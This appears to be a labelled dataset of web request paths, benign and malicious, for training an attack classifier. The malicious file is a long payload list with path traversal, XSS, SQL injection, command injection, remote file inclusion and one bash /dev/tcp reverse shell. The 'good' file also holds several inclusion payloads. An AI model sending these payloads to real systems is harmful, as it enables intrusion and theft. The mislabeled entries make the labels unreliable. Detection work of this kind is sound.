/examples/jsp/error/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
================================================
FILE: datasets/learning-datasets/testing/good.txt
================================================
/jan carbon - creamfields/
/javascript/ns.sh
/uhs reader v6/
/warez-downloads/
/issue10-news6/
/000044486/
/ncsspanish/
/145392/
/438085596epeigc_th/
/gr2006110301296/
/javascript/tcl.java
/powhome/
/foxy_information/
/complaincheck/
/bloodmoon/
/newingames/
/javascript/templates.sh
/javascript/env.err
/javascript/apple.jsp
/room/save_item.php
/hurrflood_l/
/view_172/
/000095927/
/pressreleases24/
/pyamazon/
/4351660/
/content/content.php?fileloc=http://192.168.202.96:8080/frznctvhi0i5??
/topnav_10/
/rfdump-1/
/rx7hh71uzqi/
/logopcmag/
/kijijilogo_26x13/
/aboutefa/
/index85465/
/unreal/
/1704toc/
/455007/
/15_11a/
/bolkestein/
/162099/
/javascript/tip.cpp
/1463_thumb stripyhat/
/dvdfab platinum 2/
/class.mysql.php?path_to_bt_dir=http://192.168.202.118:8080/iroy1gvqrrqu?
/5099076/
/r36w71hyn09xx/
/susandelucanyt/
/20030407/
/4087505/
/costers/
/141234/
/rfc2518/
/lib/smarty/smartyfu.class.php?system[smarty][dir]=http://cirt.net/rfiinc.txt??
/fairly/
/javascript/it.cfm
/000118956/
/gobblet/
/107170/
/262818/
/8122rca/
/thinkingaloud/
/mzk1mdu6ntoznq/
/hjmccmrd
/10509770/
/blizkrieg/
/1154741/
/20060302-1/
/intentionality/
/redirect_cnews/
/javascript/technology.mdb
/examples/jsp/sessions/search?q=http://www.nessus.org/
/file_fuzzers/
/044925/
/q52586735
/usgraham110206ind/
/sudoku-solver/
/jihad7chap1/
/up70dark/
/alticity/
/550983566ymtadz/
/om51dr/
/singertreadle/
/native2/
/savagethebattlefornewerthv2/
/msaccess/
/bmp/setconn.jsp
/javascript/imp.vbs
/marisa/
/general_electric/
/press7/
/ac67226ed451990431f317a88b31933f/
/nwqthhrld/
/eestor_ultracap/
/javascript/excalibur.java
/slet-j/
/javascript/synced.nsf
/do the crawl/
/javascript/pages.meta
/a0034773/
/cnc_pred1/
/c77bfd/
/default_fr/
/img_3909159/
/donkey kong bongo blast_information/
/177749/
/dload-archiveoff/
/javascript/publications.csproj
/000095041/
/administrator/menu_operation.php?site_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp??
/futabamagnum/
/javascript/dirs.dll
/betablockmodules/imagesmediagallerymodule/imagesmediagallerymodule.php?current_blockmodule_path=http://192.168.202.96:8080/4dckqcc0acprbz?
/fonctions/template.php?repphp=http://192.168.202.118:8080/zz5thkvtmlgl??
/javascript/base.save
/inc/shows.inc.php?cutepath=http://192.168.202.96:8080/txenjrxf3??
/przyroda/
/nyhedsbreve/
/1004359116/
/decisionpro_4/
/spamwalllogo2big/
/tolerate/
/000123583/
/27099_thumb/
/footer20/
/printer_46810/
/javascript/saml.tgz
/20030418/
/javascript/hourly.csv
/imagepreunmultiplier/
/vgrnep/
/footerleftcol_white/
/javascript/faq.jsf
/programmer-jobs/
/javascript/item.o
/javascript/ep.php
/sb116589968303947412/
/index.php?phpbb_root_path=http://192.168.202.118:8080/2aibfaczmac8?
/alert-nimda/
/000113331/
/nethome.dat
/installation-services/
/yrcjzcjjnl/
/000078106/
/img_0941/
/000044436/
/6163215/
/zachman2/
/development_prerequisites/
/javascript/schedule.ws
/19991115/
/javascript/employees.trace
/_private/
/93218036/
/178361/
/celebrity big brother uk/
/168775/
/119196/
/javascript/body.tar
/box6_rt/
/128967/
/warehouse-r0/
/djfzmsdl72/
/activitiesandinterests/
/flathead1/
/ibiz usps integrator activex vb edition v1/
/a1 jummfa audio converter v5/
/featureddt/
/pdficon/
/c161199f/
/pokermaster/
/sld011/
/20041112-5/
/box_full/
/javascript/sfish.vbs
/javascript/poll.asmx
/activerecord/
/panasonic_nvgs180/
/imovietheater134/
/samueljohnson/
/gogomini79/
/ad_hedl/
/negligent_gifts/
/apachessl/
/mother_child/
/javascript/crons.properties
/javascript/asp.dump
/keep_away/
/javascript/manifest.jsf
/041031/
/104938/
/q95899945
/splatter/
/191059/
/javascript/secured.conf
/javascript/automation.key
/hacker-personals/
/dirtyharrys_crosshair/
/info_698/
/134320/
/jbruneau/
/mmounteer/
/javascript/opengts.yml
/pathwaytogrowthjobs03172005/
/john_hiatt/
/200754/
/download-001005050/
/spam-abuse/
/butylarz/
/aib_corstudy/
/cms/meetweb/classes/managerresource.class.php?root_path=http://192.168.202.96:8080/4dckqcc0acprbz?
/whp0012us_hpc/
/sploitcast_010/
/javascript/cpadmin.xslt
/2451740/
/ashampoo uninstaller 2000 2/
/javascript/ls.ora
/usb_keylogger/
/javascript/link.php3
/dhcp_rel/
/aamn-5ej3p4/
/javascript/rules.rtf
/004577/
/canon_mvx350i/
/javascript/project.db
/javascript/prv.7z
/javascript/osc.xslt
/javascript/signoff.meta
/pacosporturbanjeans/
/dnccellphones/
/phplib/site_conf.php?ordnertiefe=http://192.168.202.118:8080/tzhfyzkbomspvm?
/040469/
/profstc/
/111205/
/155042/
/162981/
/madgamer01/
/javascript/encode.bat
/rigiconeditorial2/
/templates_club/
/irani02/
/javascript/07.tpl
/dl6812/
/javascript/low.lib
/journ2/
/bcci-1/
/3034511/
/182065/
/158818/
/javascript/labs.key
/116216/
================================================
FILE: datasets/learning-datasets/training/bad.txt
================================================
/top.php?stuff='uname >q36497765 #
/h21y8w52.nsf?<script>cross_site_scripting.nasl</script>
/ca000001.pl?action=showcart&hop=\"><script>alert('vulnerable')</script>&path=acatalog/
/scripts/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id;
/javascript/mta.exe
/examples/jsp/colors/kernel/loadkernel.php?installpath=/etc/passwd\x00
/examples/jsp/cal/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1
/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
/cgi-bin/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>
/examples/jsp/cal/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+4d+5a+50+00+02+00+00+00+04+00+0f+00+ff+ff+00+00+b8+00+00+00+00+00+00+00+40++>>esbq
/examples/jsp/colors/workarea/contentdesigner/ekformsiframe.aspx?id="><script>alert('nessus')</script>
/id;1627282494;fp;2;fpid;1/
/<img src="javascript:alert(cross_site_scripting.nasl);">.do
/bmeun223.exe?<meta http-equiv=set-cookie content="testhhwu=7044">
/htbin/windmail.exe
/<script>document.cookie="testrluj=1420;"</script>
/javascript/.passwd.jpg
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/ghl9il?\x00
/examples/jsp/jsp2/el/search=<script>alert('xss')</script>
/javascript/signer.exe
/help.php?q="&del\x0bq26193259&rem\x0b
/c'hoario\xc3\xb9/
/main.php?logout="&del\x0cq31768299&rem\x0c
/\xd0\x97\xd0\xb4\xd0\xbe\xd1\x80\xd0\xbe\xd0\xb2'\xd1\x8f/
/themes/modern/user_style.php?user_colors[bg_color]="</style><script>alert(411136083423)</script>
/nyjgaorz.mscgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgi-bin/index.php?op=default&date=200607' union select 1,501184215,1,1,1,1,1,1,1,1--&blogid=1
/scripts/cfooter.php3
/en-us/dda2qr7j.fts?<script>cross_site_scripting.nasl</script>
/?<meta http-equiv=set-cookie content="testpokn=7494">
/169okeyj.jspa?<meta http-equiv=set-cookie content="testxeoi=3573">
/j734qobz.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/error/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script
/post.asp?method=topic&forum_id=1&cat_id=1&type=wvs-xss-magic-string-410025568136
/ows-bin/windmail.exe
/manager/secure.php?cfgprogdir=/etc/passwd\x00
/debug/showproc?proc===<script>alert('vulnerable');</script>
/<script>document.cookie="testnvxc=4301;"</script>
/cacti/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331905098')</script>
/scripts/comersus_customerregistrationform.asp
/cgi-bin/search.pl?form=../../../../../../etc/passwd\x00
/help.php?q='uname >q23433168 #
/u8yiqilu.jsp?<meta http-equiv=set-cookie content="testswjp=6010">
/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1376526276--
/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/xsqln7eb.aspx?<meta http-equiv=set-cookie content="testpcbb=9254">
/u8yiqilu.dll?<script>document.cookie="testswjp=6010;"</script>
/5o9zq43e.cfm?<script>cross_site_scripting.nasl</script>
/manager/cgi/tseekdir.cgi?location=/etc/passwd\x00
/qhvu0pdg.fts?<meta http-equiv=set-cookie content="testchuc=2100">
/scripts/lsg2.cgi
/1r8cfrlf.exe?<script>document.cookie="testydan=5106;"</script>
/scripts/misc/audio.php?recording=../version.inc
/javascript/.passwd.php3
/<script>cross_site_scripting.nasl</script>.idc
/learnvbscript/
/main.php?logout="\x0duname #
/recordings/usrdetails.php?sgnuptype=csaleid<script>nessus</script>
/javascript/emea.exe
/8t9v8k7x.exe?<script>document.cookie="testhvje=9403;"</script>
/examples/jsp/error/include/error/autherror.cfm?errorcode=1&ftvar_linkp="></a><script>alert('fusetalk_mult_xss.nasl')</script><a href="
/en-us/oie504mr.jspa?<meta http-equiv=set-cookie content="testtpby=7052">
/examples/jsp/colors/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd
/cgi-bin/type.asp?itype='duware_itype_sql_injection.nasl
/help.php?q="del q66737251 #
/dslpwt15.fts?<script>document.cookie="testtkio=5454;"</script>
/lsoix5h3.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/chef's_knives/
/starnet/addons/slideshow_full.php?album_name='288150554
/examples/jsp/num/index.php?id='union/**/select/**/0,0,1369222205,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/scripts/search.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm??
/mpcgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html
/main.php?logout="rm q61955456&rem
/scripts/w04ukbv54ixz.cfm
/postscriptbarcode/
/javascript/htpasswd.exe
/javascript/mod.exe
/containsscript/
/help.php?q=;del q94314237 #
/scripts/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/tera patrick - farmer's daughter/
/cgi-sys/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/bxnyrhmh.cgi?<script>document.cookie="testmjct=1867;"</script>
/scripting languages/
/cgi-local/a1disp3.cgi?../../../../../../../../../../etc/passwd
/bxnyrhmh.cfc?<script>document.cookie="testmjct=1867;"</script>
/javascript/warez.exe
/scs86g1p.cfm?<meta http-equiv=set-cookie content="testquyx=2820">
/scripts/search.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz??
/tuwjta1w.x?<script>document.cookie="testpokn=7494;"</script>
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/ghl9il?
/cacti/javascript.php?abs_path=/etc/passwd\x00
/en-us/n9xlumt5.x?<script>cross_site_scripting.nasl</script>
/bb-hist.sh?histfile=../../../../../etc/passwd
/cgi-bin/view_user.php?list=1&letter=&sort_by='select
/<script>document.cookie="testggad=2000;"</script>
/scripts/readme.txt
/ybz5rz7a.pl?<script>document.cookie="testsbvw=6289;"</script>
/javascript/backup.exe
/javascript/htpasswd.cgi
/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1;/bin/id
/rv98iwjp.php?<script>cross_site_scripting.nasl</script>
/scripts/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script
/cgi-bin/starnet/addons/slideshow_full.php?album_name='401935065
/y8pmygrp.exe?<script>cross_site_scripting.nasl</script>
/top.php?stuff=';uname >q64815511 #
/xfkun1ku.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/checkbox/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>
/oie504mr.cfc?<meta http-equiv=set-cookie content="testtpby=7052">
/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00
/manager/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00
/iktok2bw.cfm?<script>cross_site_scripting.nasl</script>
/help.php?q=del;q81588837&rem;
/en-us/dda2qr7j.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/~eric.exe
/scripts/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini
/cgi-914/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe
/manager/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@
/acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
/cgi-bin/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00
/read.php?pagenum_rsread=1&totalrows_rsread=<script>alert('wvs-xss-magic-string-414685599129')</script>
/help.php?q='rm\x09q87915929\x09#
/recordings/calendar.php?serverpath=/etc/passwd\x00
/javascript/hardcore.exe
/examples/servlets/servlet/ovlaunch.exe
/d765w06j.cfm?<script>cross_site_scripting.nasl</script>
/javascript/scripts.exe
/i686v90l.cgi?<script>document.cookie="testfutf=1550;"</script>
/ywaxntrx.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/doc/index.php?s=/etc/passwd\x00
/scriptssearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=mbt7mplpoxxxq5dko
/javascript/program files.exe
/manager/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
/syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
/l4fz1dqw.nsf?<script>cross_site_scripting.nasl</script>
/if69ddo1.php3?<meta http-equiv=set-cookie content="testiabz=5220">
/main.php?stuff="&ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4&rem\xa0
/top.php?stuff=;sleep 7 #
/?<script>document.cookie="testqppc=8767;"</script>
/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331905182,1,1,1,1,1,1,1--&blogid=1
/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 2020390524,2,880987929,4,5,6,7,8,9,0,1,2,3 --
/main.php?logout=ver,>q12148819&rem,
/ny1b3qq4.x?<img src="javascript:alert(cross_site_scripting.nasl);">
/main.php?stuff='&sleep\x0910\x09#
/scripts/eezuu7xc7ge3.php3
/ovcgi/webappmon.exe?ins=nowait&sel=localhost&act=ping
/7uz3ok60.htm?<script>cross_site_scripting.nasl</script>
/top.php?stuff="sleep\x099\x09#
/scripts/index.php?board=nonexistant1465558133
/d44uk9h2.exe?<script>document.cookie="testmybc=2088;"</script>
/index.php?include_files[]=&include_files[query_string]=/etc/passwd
/awstatstotals.php?sort={${phpinfo()}}{${exit()}}
/help.php?q=ping;-w;11000;-n;1;1.2.3.4|rem;
/tukodz3j.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1164366855--
/ht8pn8uq.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/yver8r9o.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgi-bin/starnet/addons/slideshow_full.php?album_name='1273136253
/examples/jsp/checkbox/login.php?user="><script>alert('pubcookie_xss.nasl');</script>
/qhvu0pdg.dll?<meta http-equiv=set-cookie content="testchuc=2100">
/javascript/webbbs.exe
/<meta http-equiv=set-cookie content="testjvvf=7721">
/boilerplate.asp?nfuse_template=.../.../.../.../.../.../.../.../.../boot.ini&nfuse_currentfolder=/
/scripts/vhost.php?action=logout&time=1331919067
/examples/jsp/cal/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00
/bzuf9ozq.pl?<script>cross_site_scripting.nasl</script>
/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd\x00
/interface/login/login_frame.php?site=<script>alert(owasp zap);</script> and 1=1
/cgi-bin/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>
/scripts/default.asp
/examples/jsp/num/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
/oie504mr.htm?<script>document.cookie="testtpby=7052;"</script>
/examples/jsp/jsp2/jspx/activatemember?activatecode=&member="><script>alert('mvnforum_activatemember_xss.nasl')</script>
/en-us/account/workarea/contentdesigner/ekformsiframe.aspx?id="><script>alert('nessus')</script>
/subscriptionservices/
/scripts/index.php?getapplication=register&checknum=1&args=null
/vjbrrppi.fts?<script>cross_site_scripting.nasl</script>
/cacti/download.php?language=/etc/passwd\x00
/phpmyadmin/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/phpmyadmin/view_user.php?list=1&letter=&sort_by='select
/javascript/debug.exe
/scripts/udblphlq4nln.sh
/chief's message on violence against women/
/cacti/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js
/scripts/qg9h0c0svvat.shtml
/examples/jsp/jsp2/jspx/view_user.php?list=1&letter=&sort_by='select
/cgi-bin/perl.exe?-v
/projects/1/repository/annotate?rev=`0<&186-;exec 186<>/dev/tcp/192.168.202.118/17246;sh <&186 >&186 2>&186`
/ka'roo/
<script>document.cookie="testrluj=1420;"</script>
/javascript/maestro.exe
/top.php?stuff='&sleep 9 #
/cacti/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl
/javascript/vendors.exe
/scripts/tree.php
/subscriptions.yml
/scripts/4rzefq7dsowk.pl
/help.php?q="\x0auname\x09>q72938489\x09#
/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org
/javascript/bfc.exe
/cgi-bin/rss.php?blogid=1&profile=../../config/config.properties.php\x00
/cacti/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd
/snmx-cgi/fxm.exe
/descriptious/
/main.php?stuff="ping\x0b-w\x0b11000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
/manager/lang/index.php?file=/etc/passwd
/cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini\x00board=board_1
/o35zot2r.cfm?<script>cross_site_scripting.nasl</script>
/scripts/inc/pipe.php?hcl_path=http://xxxxxx./
/prescription-ultram/
/t7tm4m0b.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/index.php?op=default&date=200607' union select 1,1265182078,1,1,1,1,1,1,1,1--&blogid=1
/en-us/33y9gcqq.jspa?<meta http-equiv=set-cookie content="testnvxc=4301">
/ao22ww7y.cfm?<script>document.cookie="testqppc=8767;"</script>
/top.php?stuff=&ver\x0b>q21316317&rem\x0b
/6dlc2zm9.asp?<script>document.cookie="testqpux=4016;"</script>
/scripts_help/
/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1
/iajtej82.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
/main.php?logout="|ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c
/javascript/.passwd.db
/rpxyx07v.do?<meta http-equiv=set-cookie content="testbnli=1975">
/o35zot2r.exe?<script>cross_site_scripting.nasl</script>
/scriptsfaq.php?skin=../../admin/manager&tplpath=admin
/ygkjkngd.cfc?<script>document.cookie="testnago=4518;"</script>
/unix-scripts/
/d44uk9h2.exe?<meta http-equiv=set-cookie content="testmybc=2088">
/top.php?stuff=&rm;q25243259&rem;
/<meta http-equiv=set-cookie content="testqppc=8767">
/cgi-bin/sawmill6cl.exe?ho+{complete_version}
/scriptaculous/
/t7tm4m0b.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/recorder.exe
/scripts/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
/scripts/rx9ysf2iwv4j.cfm
/cgi-bin/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>
/scs86g1p.aspx?<meta http-equiv=set-cookie content="testquyx=2820">
/bxnyrhmh.dll?<meta http-equiv=set-cookie content="testmjct=1867">
/examples/jsp/colors/index.php?show=../../../../../../../../../../../etc/passwd\x00
/zuihld5m.html?<img src="javascript:alert(cross_site_scripting.nasl);">
/l13b77e5.nsf?<script>document.cookie="testjvvf=7721;"</script>
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/cgeqvnsxdv.sh'); function v
/cgi-binsearch-results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/top.php?stuff=';uname >q38627655 #
/examples/jsp/sessions/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id;
/top.php?stuff="&rm\x0cq55426988&rem\x0c
/javascript/traces.exe
/0qhcnefz.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/xampp/phonebook.php?lastname=',acunetix())/*&firstname=1
/iv5vkgam.php?<meta http-equiv=set-cookie content="testfosd=94">
/igtf0zon.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/en-us/oie504mr.dll?<meta http-equiv=set-cookie content="testtpby=7052">
/bzuf9ozq.kspx?<script>cross_site_scripting.nasl</script>
/recordings/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd
/help.php?q="&ver&rem
/169okeyj.html?<meta http-equiv=set-cookie content="testxeoi=3573">
/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
/en-us/h5sc3gxy.nsf?<script>cross_site_scripting.nasl</script>
/cacti/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd
/en-us/dda2qr7j.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/num/pfdispaly.cgi?../../../../../../etc/passwd
/smpwservicescgi.exe
/javascript/feeds.exe
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/pcousamoyu"
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
/i7prbs22.cgi?<meta http-equiv=set-cookie content="testjnre=7328">
/b5xdqgz2.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/checkbox/admin/admin.php?sid='
/nmw0do67.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/_xuzlr7swn95.php3
/ghswfouu.cfc?<script>document.cookie="testsqmm=5713;"</script>
/cgi-binsearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/examples/jsp/checkbox/rot13sj.cgi?/etc/passwd
/scripts/gwweb.exe?help=bad-request
/cgi/query?mss=../config
/t7tm4m0b.nsf?<script>cross_site_scripting.nasl</script>
/superduperdescription/
/manager/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/javascript/bank.exe
/3hlysl2x.cfc?<script>document.cookie="testgjbe=8505;"</script>
/iktok2bw.cfc?<script>cross_site_scripting.nasl</script>
/cacti/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00
/htbin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/examples/jsp/sessions/help.php?section='qualiteam_xcart_sql_xss.nasl
/606wkcop.php?<script>cross_site_scripting.nasl</script>
/examples/servlets/servlet/admin/admin.php?sid=0'
/cgi-bin/index.php?src=1&_common=1&time=1331919011&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/include/default_header.php?script_path=http://192.168.202.118:8080/tzhfyzkbomspvm?
/server.pt?open=space&name=";}</script><script>alert('plumtree_name_xss.nasl')</script>
/7u1pb2xi.html?<meta http-equiv=set-cookie content="testlwwz=718">
/examples/servlets/servlet/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/javascript/foo.exe
/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904208')</script>
/fcgi-bin/fileseek.cgi?foot=&head=;cat /etc/passwd|
/eg2u8pbv.htm?<script>cross_site_scripting.nasl</script>
/help.php?q="&del\x0cq93118475&rem\x0c
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/zffcwqffhn0;'); function v
/javascript/loading.exe
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../vtigerservice.php\x00
/cgi-bin/www/delivery/ac.php?bannerid=-1331904183+or+1=1+--+';passthru(base64_decode($_server[http_nessus_0oywsnwb]));die;/*
/cwmail.exe
/main.php?stuff=;del q92696358 #
/scripts/ws_ftp.ini
/x2gyorli.do?<script>document.cookie="testwhac=3130;"</script>
/9o6g5vkn.cfc?<script>cross_site_scripting.nasl</script>
/templates/admin/login_form.php?msg_login=<script>alert("force_xss")</script>
/scripts/sendcard.php?view=1&id='sendcard_sql.nasl
/msadm/domain/index.php3?account_name=\"><script>alert('vulnerable')</script>
/examples/jsp/cal/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/jw64yq8u.aspx?<meta http-equiv=set-cookie content="testylfu=1313">
/zv8tv7h8.php3?<meta http-equiv=set-cookie content="testcqwz=9752">
/javascript/.htaccess///skipfish.invalid/;?
/index.php?_language=../../../../../../../../../../etc/passwd\x00
/m4kkjf8l.dll?<meta http-equiv=set-cookie content="testyglc=8988">
/main.php?logout=;rm\x09q14218261\x09#
/scripts/?cmd=config
/cacti/simple/view_page?mv_arg=|cat /etc/passwd|
../../../../../../../../../../etc/passw*
/cgi-bin/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/en-us/account/whois.cgi?action=load&whois=;id
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null --
fi?/etc/passwd
/top.php?stuff=1 '" --
/en-us/<script>cross_site_scripting.nasl</script>.php
/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\x00
/cgi-bin/index.php?id=_pb9wansu9'
/cgi-bin/dataservice.asmx/authuser?username='nessus1331919210&password=nasl&needcompress=0
/sys/code/box.inc.php?config["sipssys"]=http://192.168.202.118:8080/moclyxlwqyfjnp?
/recordings/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
/main.php?logout='&uname >q16695623 #
/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/javascript/.passwd.py
/cgi-bin/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&"
/help.php?q=\x0auname\x09>q27637243\x09#
/javascript/mark.exe
/bxnyrhmh.php?<script>document.cookie="testmjct=1867;"</script>
/news.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??
/examples/jsp/checkbox/faxsurvey?cat /etc/passwd
/0z575z74.do?<meta http-equiv=set-cookie content="testuhsv=9753">
/s7qus4g3.x?<script>cross_site_scripting.nasl</script>
/forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd\x00
/main.php?logout="rm;q97754931&rem;
/qb2xy9aw.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/ihd231-xss/
/examples/jsp/colors/detail.asp?nchannel='1
/ddoworrl.cfc?<script>document.cookie="testvlau=8517;"</script>
/en-us/s7qus4g3.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/hrttz9fj.php3?<meta http-equiv=set-cookie content="testtbjy=7334">
/javascript/developers.exe
/javascript/bio.exe
/phpmyadmin/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/b5xdqgz2.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/documentation.html?phpmyadmin="><img src=1 onerror=javascript:alert(205)>
/nuh3zirz.kspx?<script>cross_site_scripting.nasl</script>
/n9xlumt5.pl?<script>cross_site_scripting.nasl</script>
/fmnveedu.htm?<script>document.cookie="testgfbr=7014;"</script>
/daddy's little princess - scene 2/
//<body><script src=http://www.example.com/test?rnd=q91324775></script>
/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://cirt.net/rfiinc.txt?
/jdx255ea.fts?<meta http-equiv=set-cookie content="testziyq=5055">
/examples/servlets/servlet/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00
/examples/jsp/error/wordtrans.php?command=show_desc&advanced=1";id; true "
/scripts/bpk_bsfe_4vq.html
/scripts/cmslogin.aspx
/cgi-915/sensepost.exe?/c+dir
/cgi-local/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00
/<script>cross_site_scripting.nasl</script>.exe
/javascript/purchasing.exe
/piranha/secure/passwd.php3
/help.php?q=ver\x09>q72339979&rem\x09
/main.php?stuff="\x0auname #
/ap58k3ci.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/dda2qr7j.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908736,1948616015 --
/ygkjkngd.cgi?<meta http-equiv=set-cookie content="testnago=4518">
/examples/jsp/colors/search.cgi?..\..\..\..\..\..\winnt\win.ini
/top.php?stuff="\x0arm\x09q52122221\x09#
/um7xpn15.fts?<meta http-equiv=set-cookie content="testotoy=6142">
